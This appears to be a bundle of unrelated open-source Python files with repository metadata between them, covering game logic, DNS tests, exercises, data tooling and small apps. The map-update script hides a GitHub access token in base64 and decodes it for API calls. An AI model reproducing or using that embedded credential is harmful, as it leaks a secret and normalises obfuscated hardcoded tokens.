def requirement_to_leave(self, context: NodeContext) -> Requirement:
return RequirementAnd([self.is_unlocked, ResourceRequirement.simple(self.resource(context))])
def resource(self, context: NodeContext) -> NodeResourceInfo:
return NodeResourceInfo.from_node(self, context)
def can_collect(self, context: NodeContext) -> bool:
resources = context.current_resources
req = self.requirement_to_activate
if resources.has_resource(self.resource(context)) or req.satisfied(resources, 0, context.database):
return not self.is_collected(context)
else:
return False
def is_collected(self, context: NodeContext) -> bool:
current_resources = context.current_resources
return all(
context.has_resource(node.resource(context))
for node in _all_nodes_in_network(context, self.network)
if node.is_unlocked.satisfied(current_resources, 0, context.database)
)
def resource_gain_on_collect(self, context: NodeContext) -> ResourceGain:
for node in _all_nodes_in_network(context, self.network):
if node.is_unlocked.satisfied(context.current_resources, 0, context.database):
yield node.resource(context), 1
def connections_from(self, context: NodeContext) -> typing.Iterator[tuple[Node, Requirement]]:
for node in _all_nodes_in_network(context, self.network):
if node != self:
yield node, node.is_unlocked
|
randovania/randovania
|
randovania/game_description/db/teleporter_network_node.py
|
teleporter_network_node.py
|
py
| 3,434 |
python
|
en
|
code
| 165 |
github-code
|
6
|
39269318225
|
import logging
import os
import random
import sys
from functools import wraps
from pprint import pformat
from subprocess import Popen, PIPE
from threading import Thread
from dim import db
from dim.models.dns import OutputUpdate
from dim.rpc import TRPC
from tests.pdns_test import PDNSTest
from tests.pdns_util import compare_dim_pdns_zones, this_dir, test_pdns_output_process
def delete_record(rpc, r):
rpc.rr_delete(zone=r['zone'], name=r['record'], type=r['type'], **r['value'])
def add_record(rpc, r):
rpc.rr_create(zone=r['zone'], name=r['record'], type=r['type'], ttl=r['ttl'], **r['value'])
def extract(l, selected_idx):
'''split l into two lists: elements with indices in selected and the rest'''
selected = []
rejected = []
selected_idx = set(selected_idx)
for i, e in enumerate(l):
if i in selected_idx:
selected.append(e)
else:
rejected.append(e)
return selected, rejected
class TestRequestProxy(object):
''''
Simulate the flask lifecycle of a request by creating a new TRPC instance and request context
(which in turns creates a new db session)
'''
def __init__(self, username, app):
self.app = app
self.username = username
def __getattr__(self, name):
if not name.startswith('_'):
obj = TRPC(username=self.username)
func = getattr(obj, name)
if callable(func):
@wraps(func)
def wrapper(*args, **kwargs):
with self.app.test_request_context():
return func(*args, **kwargs)
return wrapper
raise AttributeError
done = False
def run_test(app, zone, pdns_output, db_uri, pdns_ip):
global done
try:
rpc = TestRequestProxy('test_user', app)
def check_zone():
global done
pdns_output.wait_updates(zone)
if not compare_dim_pdns_zones(rpc, pdns_ip, {zone: None}):
done = True
if done:
sys.exit()
check_zone()
rpc.zone_dnssec_enable(zone, nsec3_algorithm=1, nsec3_iterations=1, nsec3_salt='deadcafe')
check_zone()
records = rpc.rr_list(zone=zone, value_as_object=True)
created = [r for r in records if r['type'] not in ('SOA', 'DNSKEY')]
deleted = []
total = len(created)
for _ in range(30):
selected = random.sample(range(total), random.randint(1, 5))
midpoint = len(created)
to_del, created = extract(created, [i for i in selected if i < midpoint])
to_add, deleted = extract(deleted, [i - midpoint for i in selected if i >= midpoint])
created.extend(to_add)
deleted.extend(to_del)
print('Adding', pformat(to_add))
print('Deleting', pformat(to_del))
for r in to_del:
delete_record(rpc, r)
for r in to_add:
add_record(rpc, r)
check_zone()
rpc.zone_dnssec_disable(zone)
check_zone()
except:
logging.exception('Exception in run_test')
done = True
def import_zone(zone):
proc = Popen(['ndcli', 'import', 'zone', zone], stdin=PIPE, stdout=PIPE)
zone_contents = open(this_dir(zone)).read()
stdout, stderr = proc.communicate(zone_contents)
if proc.returncode != 0:
raise Exception('zone import failed')
class PDNSOutputProcess(object):
def __enter__(self):
self.proc = test_pdns_output_process(True)
return self
def __exit__(self, *args):
self.proc.kill()
self.proc = None
def wait_updates(self, zone):
'''Wait for all updates to be processed'''
with test.app.test_request_context():
while True:
db.session.rollback()
if OutputUpdate.query.filter(OutputUpdate.zone_name == zone).count() == 0:
break
else:
os.read(self.proc.stdout.fileno(), 1024)
if __name__ == '__main__':
zones = {'web.de': {'db_uri': 'mysql://pdns:[email protected]:3307/pdns1',
'pdns_ip': '127.1.1.1'},
'web2.de': {'db_uri': 'mysql://pdns:[email protected]:3307/pdns2',
'pdns_ip': '127.2.2.2'}}
global test
test = PDNSTest('__init__')
test.setUp()
for zone in list(zones.keys()):
test.cleanup_pdns_db(zones[zone]['db_uri'])
import_zone(zone)
test.create_output_for_zone(zone, zone, zone, db_uri=zones[zone]['db_uri'])
with PDNSOutputProcess() as pdns_output:
threads = []
for zone, attr in zones.items():
t = Thread(target=run_test, args=(test.app, zone, pdns_output), kwargs=attr)
t.start()
threads.append(t)
for t in threads:
while t.isAlive():
t.join(0.1)
|
1and1/dim
|
dim-testsuite/tests/pdns_changes.py
|
pdns_changes.py
|
py
| 4,950 |
python
|
en
|
code
| 39 |
github-code
|
6
|
8169757480
|
"""
Exercício 4
Nome na vertical em escada. Modifique o programa anterior de forma a mostrar o nome em formato de escada.
F
FU
FUL
FULA
FULAN
FULANO
"""
nome = input('Digite seu nome: ').strip().upper()
# OPÇÃO 1
n = ''
for c in nome:
n += c
print(n)
# OPÇÃO 2
# for c in range(len(nome)+1):
# print(nome[:c])
|
fabriciovale20/ListaExerciciosPythonBrasil
|
6. String/ex004.py
|
ex004.py
|
py
| 341 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
39261296650
|
import os
import shutil
import zipfile
from base64 import b64decode
from utils.config import config
import requests
root_path = os.getcwd()
gat = (
"Z2l0aHViX3BhdF8xMUJBQkhHNkEwa1JRZEM1dFByczhVXzU0cERCS21URXRGYm"
"FYRElUWE5KVUk4VkUxVTdjb0dHbElMSWdhVnI2Qkc3QzVCN0lCWlhWdDJMOUo2"
)
def download_and_extract_zip(url, root_path):
zip_file_path = os.path.join(root_path, "repository.zip")
response = requests.get(url, stream=True)
response.raise_for_status()
total_size = int(response.headers.get("Content-Length", 0))
if total_size == 0:
print("下载失败!")
return 0
block_size = 1024 # 每次下载的块大小
progress = 0
with open(zip_file_path, "wb") as file:
for data in response.iter_content(block_size):
progress += len(data)
file.write(data)
# 计算下载进度并显示进度条
percent = (progress / total_size) * 100
progress_bar = "=" * int(percent // 5) + ">"
print(f"下载进度: {percent:.2f}% [{progress_bar:<20}] ", end="\r")
print("\n下载完成!")
# 解压ZIP文件
with zipfile.ZipFile(zip_file_path, "r") as zip_ref:
zip_ref.extractall(root_path)
os.remove(zip_file_path) # 删除ZIP文件
return 1
def sync_github_repo(repo_url, root_path):
# 构建API URL
api_url = f"https://api.github.com/repos/{repo_url}/zipball/main"
# 检查保存路径是否存在,如果不存在则创建
os.makedirs(root_path, exist_ok=True)
# 下载并解压ZIP文件
return download_and_extract_zip(api_url, root_path)
def get_latest_branch_sha(repo_url):
url = f"https://api.github.com/repos/{repo_url}/branches"
headers = {
"Accept": "application/vnd.github.v3+json",
"Authorization": b64decode(gat).decode("utf-8"),
}
try:
response = requests.get(url, headers=headers, timeout=3)
except:
return None
if response.status_code == 200:
branches = response.json()
if branches:
latest_branch = branches[0]
return latest_branch["commit"]["sha"]
else:
return None
def copy_folder_contents(source_folder, destination_folder):
# 检查目标文件夹是否存在,如果不存在则创建
if not os.path.exists(destination_folder):
os.makedirs(destination_folder)
# 遍历源文件夹中的所有文件和子文件夹
for item in os.listdir(source_folder):
source = os.path.join(source_folder, item)
destination = os.path.join(destination_folder, item)
if os.path.isfile(source):
# 如果源项是文件,则直接复制并覆盖同名文件
shutil.copy2(source, destination)
elif os.path.isdir(source):
# 如果源项是文件夹,则递归地调用复制函数
copy_folder_contents(source, destination)
def update_map(force=False):
repo_url = "CHNZYX/maps"
# 获取远端sha
remote_sha = get_latest_branch_sha(repo_url)
if remote_sha is None:
print("远端地图sha获取失败, 请检查网络连接")
return "远端地图sha获取失败, 请检查网络连接", "red"
print("远端地图sha: " + remote_sha)
# 获取本地sha
local_sha = config.map_sha
print("本地地图sha: " + local_sha)
# 判断是否需要更新
if remote_sha == local_sha:
print("map无需更新")
return "地图已是最新版本", "green"
map_path = os.path.join(root_path, "imgs\\maps")
print("Map path: " + map_path)
# 下载map仓库并解压
status = sync_github_repo(repo_url, root_path)
if status == 0:
return "下载失败", "red"
print("下载完成")
# 找出下载的map文件夹
t = os.listdir(root_path)
chn_folders = [item for item in t if item.startswith("CHNZYX")]
downloaded_map_path = os.path.join(os.path.join(root_path, chn_folders[0]), "maps")
print("download_map_path: " + downloaded_map_path)
print("解压中...")
# 删除原有map文件夹,复制新的map文件夹
if force:
shutil.rmtree(map_path)
shutil.copytree(downloaded_map_path, map_path)
else:
copy_folder_contents(downloaded_map_path, map_path)
shutil.rmtree(os.path.dirname(downloaded_map_path))
# 更新sha
config.map_sha = remote_sha
config.save()
print("更新完成")
return "更新完成", "green"
|
CHNZYX/Auto_Simulated_Universe
|
utils/update_map.py
|
update_map.py
|
py
| 4,483 |
python
|
en
|
code
| 2,771 |
github-code
|
6
|
5308998970
|
# ababcdcdababcdcd ->2ab2cd2ab2cd ->2 ababcdcd
# abcabcdede -> abcabc2de ->2abcdede
# 1씩 증가하면서 묶기 -> 같은거 있으면 합치기 -> 길이 구하기
# 하나가 에러남 -> 길이가 1,2,3 일 때 예외처리하면 안남
def solution(s):
def merge_len(var):
cnt = 1
temp = ''
# 마지막인 경우 케이스 생각해야함
for i in range(len(var)-1):
if var[i] == var[i+1]:
cnt += 1
if (i+1) == len(var)-1:
temp += str(cnt) + var[i]
else:
if cnt > 1:
temp += str(cnt) + var[i]
else:
temp += var[i]
cnt = 1
if (i+1) == len(var)-1:
temp += var[i+1]
return len(temp)
if len(s) == 1:
return 1
elif len(s) == 2:
return 2
elif len(s) == 3:
return 3
minimum = merge_len(s)
for i in range(2, len(s)//2+1):
temp = []
for j in range(0, len(s), i):
# 이 경우 이렇게 예외처리 안해도 제대로 잘려짐
# if j+i-1 > len(s)-1:
# temp.append(s[j:])
# break
temp.append(s[j:j+i])
minimum = min(minimum, merge_len(temp))
return minimum
# def compress(text, tok_len):
# words = [text[i:i+tok_len] for i in range(0, len(text), tok_len)]
# res = []
# cur_word = words[0]
# cur_cnt = 1
# for a, b in zip(words, words[1:] + ['']):
# if a == b:
# cur_cnt += 1
# else:
# res.append([cur_word, cur_cnt])
# cur_word = b
# cur_cnt = 1
# return sum(len(word) + (len(str(cnt)) if cnt > 1 else 0) for word, cnt in res)
# def solution(text):
# [len(text)] -> text 길이가 1,2,3 인 경우 예외 때문에 입력해야함.
# return min(compress(text, tok_len) for tok_len in list(range(1, int(len(text)/2) + 1)) + [len(text)])
|
louisuss/Algorithms-Code-Upload
|
Python/Programmers/Level2/문자열압축.py
|
문자열압축.py
|
py
| 2,022 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
15503714340
|
import numpy as np
a = np.array([1, 2, 3, 4])
b = np.array([5, 6, 7, 8])
c = np.add(a, b)
print(c)
# creating a custom ufunc - universal functions
def add_2_str(v, k):
y = v + k
return y
add_2_str = np.frompyfunc(add_2_str, nin=2, nout=1)
print(add_2_str([1, 2, 3, 4, 5], [6, 7, 8, 9, 10]))
print(add_2_str("Hie", "Hello"))
# displays it is a function class from numpy
print(type(add_2_str))
|
BLACKANGEL-1807/Python-Scripts
|
Numpy(basics)/numpy_ufunc.py
|
numpy_ufunc.py
|
py
| 406 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27070905288
|
import datetime as dt
import random
import pytest
from scheduler import Scheduler, SchedulerError
from scheduler.base.definition import JobType
from scheduler.threading.job import Job
from ...helpers import DELETE_NOT_SCHEDULED_ERROR, foo
@pytest.mark.parametrize(
"n_jobs",
[
1,
2,
3,
10,
],
)
def test_delete_job(n_jobs):
sch = Scheduler()
assert len(sch.jobs) == 0
jobs = []
for _ in range(n_jobs):
jobs.append(sch.once(dt.datetime.now(), foo))
assert len(sch.jobs) == n_jobs
job = random.choice(jobs)
sch.delete_job(job)
assert job not in sch.jobs
assert len(sch.jobs) == n_jobs - 1
# test error if the job is not scheduled
with pytest.raises(SchedulerError, match=DELETE_NOT_SCHEDULED_ERROR):
sch.delete_job(job)
@pytest.mark.parametrize(
"empty_set",
[
False,
True,
],
)
@pytest.mark.parametrize(
"any_tag",
[
None,
False,
True,
],
)
@pytest.mark.parametrize(
"n_jobs",
[
0,
1,
2,
3,
10,
],
)
def test_delete_jobs(n_jobs, any_tag, empty_set):
sch = Scheduler()
assert len(sch.jobs) == 0
for _ in range(n_jobs):
sch.once(dt.datetime.now(), foo)
assert len(sch.jobs) == n_jobs
if empty_set:
if any_tag is None:
num_del = sch.delete_jobs()
else:
num_del = sch.delete_jobs(any_tag=any_tag)
else:
if any_tag is None:
num_del = sch.delete_jobs(tags={})
else:
num_del = sch.delete_jobs(tags={}, any_tag=any_tag)
assert len(sch.jobs) == 0
assert num_del == n_jobs
@pytest.mark.parametrize(
"job_tags, delete_tags, any_tag, n_deleted",
[
[[{"a", "b"}, {"1", "2", "3"}, {"a", "1"}], {"a", "1"}, True, 3],
[[{"a", "b"}, {"1", "2", "3"}, {"a", "2"}], {"b", "1"}, True, 2],
[[{"a", "b"}, {"1", "2", "3"}, {"b", "1"}], {"3"}, True, 1],
[[{"a", "b"}, {"1", "2", "3"}, {"b", "2"}], {"2", "3"}, True, 2],
[[{"a", "b"}, {"1", "2", "3"}, {"a", "1"}], {"a", "1"}, False, 1],
[[{"a", "b"}, {"1", "2", "3"}, {"a", "2"}], {"b", "1"}, False, 0],
[[{"a", "b"}, {"1", "2", "3"}, {"b", "1"}], {"1", "3"}, False, 1],
[[{"a", "b"}, {"1", "2", "3"}, {"b", "2"}], {"2", "3"}, False, 1],
],
)
def test_delete_tagged_jobs(job_tags, delete_tags, any_tag, n_deleted):
sch = Scheduler()
for tags in job_tags:
sch.once(dt.timedelta(), lambda: None, tags=tags)
assert sch.delete_jobs(tags=delete_tags, any_tag=any_tag) == n_deleted
|
DigonIO/scheduler
|
tests/threading/scheduler/test_sch_delete_jobs.py
|
test_sch_delete_jobs.py
|
py
| 2,653 |
python
|
en
|
code
| 51 |
github-code
|
6
|
6814879797
|
import pika, json
def upload(f, fs, channel, access):
# put file into mongodb database
try:
# get file if success
fid = fs.put(f)
except Exception as err:
return "internal server error", 500
# create message
message = {
"video_fid": str(fid),
"mp3_fid": None,
# who owns the file
"username": access["username"],
}
# put message in queue
try:
channel.basic_publish(
exchange="",
routing_key="video",
# convert python object to json string
body=json.dumps(message),
properties=pika.BasicProperties(
# make messages persistent
delivery_mode=pika.PERSISTENT_DELIVERY_MODE
),
)
# if message unsuccesfully added to the queue
except:
# delete file, because it's not connected to any message
fs.delete(fid)
return "internal server error", 500
|
dawmro/testing_microservice_architectures
|
python/src/gateway/storage/util.py
|
util.py
|
py
| 807 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29800711842
|
import mraa
import time
RedPin = 3
BluePin = 4
# humidity_seneor = mraa.Gpio(sensorPin)
# humidity_seneor.dir(mraa.DIR_IN)
i = 0
redLED = mraa.Gpio(RedPin)
blueLED = mraa.Gpio(BluePin)
redLED.dir(mraa.DIR_OUT)
blueLED.dir(mraa.DIR_OUT)
try:
while (1):
redLED.write(True)
blueLED.write(False)
time.sleep(1)
redLED.write(False)
blueLED.write(True)
time.sleep(1)
except KeyboardInterrupt:
redLED.write(False)
blueLED.write(False)
exit
|
RichardZSJ/IoT-Project
|
test sensor.py
|
test sensor.py
|
py
| 481 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8097011811
|
import pathlib
import PIL.Image
import PIL.ImageChops
import pyscreenshot
from sigsolve import imageutil, geometry
import numpy
def rehydrate(array):
# return PIL.Image.frombytes('RGB', array.shape[:2], array.astype(numpy.uint8).tobytes())
return PIL.Image.fromarray(array, 'RGB')
class Vision:
# How many light levels can a tile differ (in either direction) from the baseline before the tile is no longer
# considered empty. This relies on integer rollover to avoid needing an in16 over a uint8.
MAX_EMPTY_TOLERANCE = 2
@staticmethod
def _getimage(what):
if isinstance(what, (str, bytes, pathlib.Path)):
what = PIL.Image.open(what)
if what.mode != 'RGB':
what = what.convert('RGB')
return what
def __init__(self, baseline=None, composites=None, extents=None):
"""
Handles image processing state functionality.
:param baseline: Baseline image. If this is a string or Path object, it is assumed to be a filename and is
loaded.
:param composites: Optional dictionary of composite images (or image filenames), with IDs as keys.
:param extents: Rectangle of the area we're interested in. Default is the whole image.
"""
self.baseline = self._getimage(baseline)
if extents:
self.baseline = self.baseline.crop(extents.coords)
else:
extents = geometry.Rect(geometry.Point.ORIGIN, self.baseline.size)
self.baseline = imageutil.numpify(self.baseline)
self.baseline.flags.writeable = True
# Some processing.
self.baseline += self.MAX_EMPTY_TOLERANCE
self.baseline[self.baseline < self.MAX_EMPTY_TOLERANCE] = 255 # Cap off what just rolled over
self.extents = extents
self.offset = -self.extents.xy1
self.composites = {}
if composites is not None:
for key, image in composites.items():
self.add_composite(key, image)
self.image = None
def add_composite(self, key, image):
self.composites[key] = imageutil.numpify(self._getimage(image)).astype(numpy.int16)
def match(self, tile):
"""Finds the composite that most closely matches the source tile's image."""
coords = (tile.sample_rect + self.offset).coords
base = self.baseline[coords[1]:coords[3], coords[0]:coords[2], 0:3]
cropped = self.image.crop(coords)
if numpy.all(base - imageutil.numpify(cropped) < 2*self.MAX_EMPTY_TOLERANCE):
return None
data = imageutil.numpify(imageutil.equalize(cropped)).astype(numpy.int16)
buf = numpy.ndarray(data.shape, data.dtype)
unsigned = buf.view(numpy.uint16)
best = None
bestscore = None
for key, composite in self.composites.items():
numpy.subtract(data, composite, out=buf) # Initialize buf with a difference between the two arrays
# We casually convert between signed and unsigned here, and the math just happens to work out due to
# sign extension and truncation.
unsigned **= 2 # Raise all values to power of 2.
score = numpy.sum(unsigned)
if bestscore is None or score < bestscore:
bestscore = score
best = key
return best
def screenshot(self):
"""Sets the image to a screenshot"""
self.set_image(
pyscreenshot.grab(self.extents.coords), cropped=True
)
def set_image(self, image, cropped=False):
"""Sets the image"""
image = self._getimage(image)
if not cropped and (self.extents.xy1 != geometry.Point.ORIGIN or self.extents.xy2 != image.size):
image = image.crop(self.extents.coords)
self.image = image
|
dewiniaid/sigsolve
|
sigsolve/vision.py
|
vision.py
|
py
| 3,821 |
python
|
en
|
code
| 3 |
github-code
|
6
|
31951175852
|
#TESTING EXCERCISES
from random import choice
import string
class Boggle:
def __init__(self):
self.words = self.read_dict("words.txt")
def read_dict(self, dict_path):
with open(dict_path) as dict_file:
return [word.strip() for word in dict_file]
def make_board(self):
board = []
for y in range(5):
row = [choice(string.ascii_uppercase) for _ in range(5)]
board.append(row)
return board
def check_valid_word(self, board, word):
word_exists = word in self.words
valid_word = self.find(board, word.upper())
if word_exists and valid_word:
result = "ok"
elif word_exists and not valid_word:
result = "not-on-board"
else:
result = "not-word"
return result
def find_from(self, board, word, y, x, seen):
if x > 4 or y > 4:
return
if board[y][x] != word[0]:
return False
if (y, x) in seen:
return False
if len(word) == 1:
return True
seen = seen | {(y, x)}
neighbors = [(y-1, x), (y+1, x), (y, x-1), (y, x+1),
(y-1, x-1), (y+1, x+1), (y-1, x+1), (y+1, x-1)]
for ny, nx in neighbors:
if self.find_from(board, word[1:], ny, nx, seen):
return True
seen.remove((y, x))
return False
def find(self, board, word):
for y in range(0, 5):
for x in range(0, 5):
if self.find_from(board, word, y, x, seen=set()):
return True
return False
|
ortolanotyler/flaskproblemsets
|
24.5/boggle.py
|
boggle.py
|
py
| 1,651 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21355088375
|
class Solution:
def networkDelayTime(self, times, n: int, k: int) -> int:
graph = dict()
for i in range(1, n+1):
graph[i] = dict()
for edge in times:
graph[edge[0]][edge[1]] = edge[2]
all_node = {i for i in range(1, n+1)}
t_node = {k}
dist = [float('inf')]*(n+1)
dist[k] = 0
while True:
min_path = float('inf')
min_idx = -1
for n in t_node:
for ntr in graph[n].keys():
# print(ntr)
if ntr not in t_node and dist[n]+graph[n][ntr] < min_path:
min_path = dist[n]+graph[n][ntr]
min_idx = ntr
if min_path == float('inf'):
return -1
else:
t_node |= {min_idx}
dist[min_idx] = min_path
if t_node == all_node:
break
# print(dist, t_node, all_node)
return max(dist[1:])
s = Solution()
print(s.networkDelayTime(
# [[2,1,1],[2,3,1],[3,4,1]],
# 4, 2
[[1,2,1]],
2,2
))
|
Alex-Beng/ojs
|
FuckLeetcode/743. 网络延迟时间.py
|
743. 网络延迟时间.py
|
py
| 1,153 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12026854258
|
import sys
from PyQt4 import QtGui, QtCore
import pyfits
import os
from gui import Ui_mainwindow as MW
from analysis import *
class ModeloTablaEjes(QtCore.QAbstractListModel):
def __init__(self, ejes = [], parent = None):
QtCore.QAbstractListModel.__init__(self,parent)
self._ejes = ejes
def rowCount(self, parent):
return len(self._ejes)
def data(self, index, role):
if role == QtCore.Qt.DisplayRole:
row = index.row()
value = self._ejes[row]
return value
class MainWindow(QtGui.QMainWindow):
CurrentPath = ""
CurrentFile = ""
Simple = False
NAxis = 0
BitPix = 0
Axis = []
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = MW()
self.ui.setupUi(self)
self.ui.actionOpen.triggered.connect(self.test)
def test(self):
filename = str(QtGui.QFileDialog.getOpenFileName(self, "Open Fits"))
self.CurrentPath = filename
self.CurrentFile = os.path.basename(filename)
print(filename)
self.lectura()
def lectura(self):
hdu = pyfits.open(str(self.CurrentPath))
header = hdu[0].header
self.Simple = str(header["SIMPLE"])
self.BitPix = str(header["BITPIX"])
self.NAxis = str(header["NAXIS"])
for i in range(1, (int(self.NAxis)+1)):
eje = "NAXIS" + str(i)
self.Axis.append(header[eje])
hdu.close()
#self.Cluster()
self.Mostrar()
def Mostrar(self):
"""
Muestra los datos del Fit en la pantalla principal.
:return Null
"""
self.ui.textBrowser.setText(self.CurrentFile)
self.ui.textBrowser_2.setText(self.Simple)
self.ui.textBrowser_3.setText(self.BitPix)
self.ui.textBrowser_4.setText(self.NAxis)
model = ModeloTablaEjes(self.Axis)
self.ui.tableView.setModel(model)
scene = QtGui.QGraphicsScene()
scene.setSceneRect(-600,-600, 600,600)
pic = QtGui.QPixmap("1-Orig.png")
scene.addItem(QtGui.QGraphicsPixmapItem(pic))
self.ui.graphicsView.setScene(scene)
self.ui.graphicsView.setRenderHint(QtGui.QPainter.Antialiasing)
self.ui.graphicsView.show()
def Cluster(self):
ana = analicis()
ana.Clusterisar(self.CurrentPath, self.CurrentFile)
if __name__ == "__main__":
dirs()
app = QtGui.QApplication(sys.argv)
myapp = MainWindow()
myapp.show()
sys.exit(app.exec_())
|
ChivoAttic/StructureDetection
|
Gui/app.py
|
app.py
|
py
| 2,574 |
python
|
en
|
code
| 2 |
github-code
|
6
|
14594653005
|
import tensorflow as tf
import pathlib
import os
import cv2
import numpy as np
import tqdm
import argparse
class TFRecordsSeg:
def __init__(self,
image_dir="/datasets/custom/cityscapes",
label_dir="/datasets/custom/cityscapes",
tfrecord_path="data.tfrecords",
classes=34,
img_pattern="*.png",
label_pattern="*.png"):
"""
:param data_dir: the path to iam directory containing the subdirectories of xml and lines from iam dataset
:param tfrecord_path:
"""
# self.data_dir = data_dir
# self.labels_dir = os.path.join(data_dir, "gtFine/{}".format(split))
# self.image_dir = os.path.join(data_dir, "leftImg8bit/{}".format(split))
self.image_dir = image_dir
self.labels_dir = label_dir
self.tfrecord_path = tfrecord_path
self.labels = []
self.classes = classes
self.img_pattern = img_pattern
self.label_pattern = label_pattern
self.image_feature_description = \
{
'label': tf.io.FixedLenFeature([], tf.string),
'image': tf.io.FixedLenFeature([], tf.string)
}
@staticmethod
def _bytes_feature(value):
"""Returns a bytes_list from a string / byte."""
if isinstance(value, type(tf.constant(0))):
value = value.numpy() # BytesList won't unpack a string from an EagerTensor.
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
@staticmethod
def _float_feature(value):
"""Returns a float_list from a float / double."""
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
@staticmethod
def _int64_feature(value):
"""Returns an int64_list from a bool / enum / int / uint."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _parse_example_function(self, example_proto):
# Parse the input tf.Example proto using the dictionary above.
return tf.io.parse_example(example_proto, self.image_feature_description)
def image_example(self, image_string, label):
feature = {
'label': self._bytes_feature(label),
'image': self._bytes_feature(image_string)
}
return tf.train.Example(features=tf.train.Features(feature=feature))
def return_inst_cnts(self, inst_ex):
inst_cnt = np.zeros(inst_ex.shape)
for unique_class in np.unique(inst_ex):
inst_img = (inst_ex == unique_class) / 1
cnts, _ = cv2.findContours(inst_img.astype("uint8"), cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
inst_cnt = cv2.drawContours(inst_cnt, cnts, -1, (1., 1., 1.), thickness=1)
return inst_cnt
def write_tfrecords(self, training=False, dataset_name=""):
img_paths = sorted(pathlib.Path(self.image_dir).rglob(self.img_pattern))
label_paths = sorted(pathlib.Path(self.labels_dir).rglob(self.label_pattern))
with tf.io.TFRecordWriter(self.tfrecord_path) as writer:
for img_path, label_path in tqdm.tqdm(zip(img_paths, label_paths)):
img_string = open(str(img_path), 'rb').read()
label_string = open(str(label_path), 'rb').read()
tf_example = self.image_example(img_string, label_string)
writer.write(tf_example.SerializeToString())
if training:
import json
if os.path.exists('{}/data_samples.json'.format(os.path.dirname(self.tfrecord_path))):
with open('{}/data_samples.json'.format(os.path.dirname(self.tfrecord_path))) as f:
data = json.load(f)
if dataset_name in list(data.keys()):
print("Dataset {} value was already present but value was updated".format(dataset_name))
else:
data = {}
data[dataset_name] = len(img_paths)
with open('{}/data_samples.json'.format(os.path.dirname(self.tfrecord_path)), 'w') as json_file:
json.dump(data, json_file)
def decode_strings(self, record):
images = tf.io.decode_jpeg(record['image'], 3)
labels = tf.io.decode_jpeg(record['label'], 3)
return images, labels
def read_tfrecords(self):
"""
Read iam tfrecords
:return: Returns a tuple of images and their label (images, labels)
"""
raw_dataset = tf.data.TFRecordDataset(self.tfrecord_path)
parsed_dataset = raw_dataset.map(self._parse_example_function)
decoded_dataset = parsed_dataset.map(self.decode_strings)
return decoded_dataset
if __name__ == "__main__":
classes = 150
dataset_name = "ade20k1"
train = TFRecordsSeg(image_dir="/volumes2/datasets/ADEChallengeData2016/images/training",
label_dir="/volumes2/datasets/ADEChallengeData2016/annotations/training",
tfrecord_path="/data/input/datasets/tf2_segmentation_tfrecords/{}_train.tfrecords".format(dataset_name),
classes=classes, img_pattern="*.jpg",
label_pattern="*.png")
# train = TFRecordsSeg(data_dir="/data/input/datasets/cityscape_processed", tfrecord_path="/volumes1/train.tfrecords", split='train')
val = TFRecordsSeg(image_dir="/volumes2/datasets/ADEChallengeData2016/images/validation",
label_dir="/volumes2/datasets/ADEChallengeData2016/annotations/validation",
tfrecord_path="/data/input/datasets/tf2_segmentation_tfrecords/{}_val.tfrecords".format(dataset_name),
classes=classes, img_pattern="*.jpg",
label_pattern="*.png")
train.write_tfrecords(training=True, dataset_name=dataset_name)
val.write_tfrecords()
# example = train
# image_dataset = example.read_tfrecords().repeat(10)
# cv2.namedWindow("img", 0)
# cv2.namedWindow("label", 0)
# for image_features in image_dataset:
# img = image_features[0][..., ::-1]
# label = image_features[1]
# print(np.unique(label.numpy()))
# insts = image_features[2]
# cv2.imshow("img", img.numpy())
# cv2.imshow("label", label.numpy()/classes)
# cv2.waitKey()
# print(image_features[0].shape, image_features[1].shape, image_features[2].shape)
# example.write_tfrecords()
# image_dataset = example.read_tfrecords().shuffle(10000)
#
# for image_features in image_dataset.take(10):
# print(image_features[0].shape, image_features[1].numpy())
|
AhmedBadar512/Badr_AI_Repo
|
utils/create_seg_tfrecords.py
|
create_seg_tfrecords.py
|
py
| 6,714 |
python
|
en
|
code
| 2 |
github-code
|
6
|
26234013938
|
#!/usr/bin/python3
"""Starts a basic flask web application"""
from flask import Flask, render_template
from markupsafe import escape
from models import storage
from models.state import State
from models.city import City
app = Flask(__name__)
@app.teardown_appcontext
def teardown(self):
"""procedure to run after request"""
storage.close()
@app.route("/states_list", strict_slashes=False)
def states_list():
"""Function to run when '/states_list' is accessed"""
states = [state for state in storage.all(State).values()]
states.sort(reverse=False, key=lambda state: state.name)
return (render_template('7-states_list.html', states=states))
@app.route("/cities_by_states", strict_slashes=False)
def cities_by_statesb():
"""Function to run when '/cities_by_states' is accessed"""
states = storage.all(State).values()
return (render_template('8-cities_by_states.html', states=states))
if (__name__ == '__main__'):
app.run(host='0.0.0.0', port=5000, debug=False)
|
AndyMSP/holbertonschool-AirBnB_clone_v2
|
web_flask/8-cities_by_states.py
|
8-cities_by_states.py
|
py
| 1,008 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35515894022
|
import sys
sys.path.append('..')
from common.wrapped_input import wrapped_input
from common.clean_screen import clean_screen
__TERMINATE_MARKS__ = ['***', '****']
class Reader:
def __init__(self, args):
self.loop = True
def run(self, parser):
print("""
_ __ __,
( / ) o (
/--< _ __, , _ _ `. ,_ __ ,
/___// (_(_/(_(_/ / /_(___)_/|_)_/ (_/_
/| /
Interactive shell (/ '
==========================================
""")
last_input = ''
while last_input not in __TERMINATE_MARKS__:
last_input = wrapped_input()
if last_input in __TERMINATE_MARKS__:
print('[INFO] Querying, please wait...')
return last_input
parser.add(last_input)
|
ezPsycho/brainSpy-cli
|
src/readers/interactive.py
|
interactive.py
|
py
| 881 |
python
|
en
|
code
| 6 |
github-code
|
6
|
277770918
|
import os, sys
import subprocess
# os.environ['DISPLAY'] = ':99.0'
# os.environ['PYVISTA_OFF_SCREEN'] = 'true'
# os.environ['PYVISTA_USE_IPYVTK'] = 'true'
# bashCommand ="Xvfb :99 -screen 0 1024x768x24 > /dev/null 2>&1 & sleep 3"
